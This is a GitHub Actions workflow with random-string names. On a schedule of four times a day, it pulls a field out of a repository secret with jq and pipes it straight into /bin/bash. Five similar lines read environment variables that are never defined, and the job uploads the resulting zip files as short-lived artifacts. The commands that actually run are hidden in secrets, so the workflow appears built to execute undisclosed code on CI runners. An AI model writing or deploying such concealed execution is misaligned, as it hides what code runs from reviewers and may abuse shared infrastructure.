name: yuandabokai
on:
  workflow_dispatch:

  schedule:
    - cron: '53 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuandabokai
        env:
          xag73443: ${{ secrets.xag73443 }}
        run: |
          printf '%s' "$xag73443" | jq -r .dqrln73733 | /bin/bash
          printf '%s' "$tn20220" | jq -r .wv146 | /bin/bash
          echo $fx37309 | jq -r .mlxua2 | /bin/bash
          printf '%s' "$wc453" | jq -r .yy882 | /bin/bash
          printf '%s' "$jcw1" | jq -r .ox581 | /bin/bash
          echo $qpy7 | jq -r .kul4 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: cn34w24r
          path: "*.zip"
          retention-days: 1
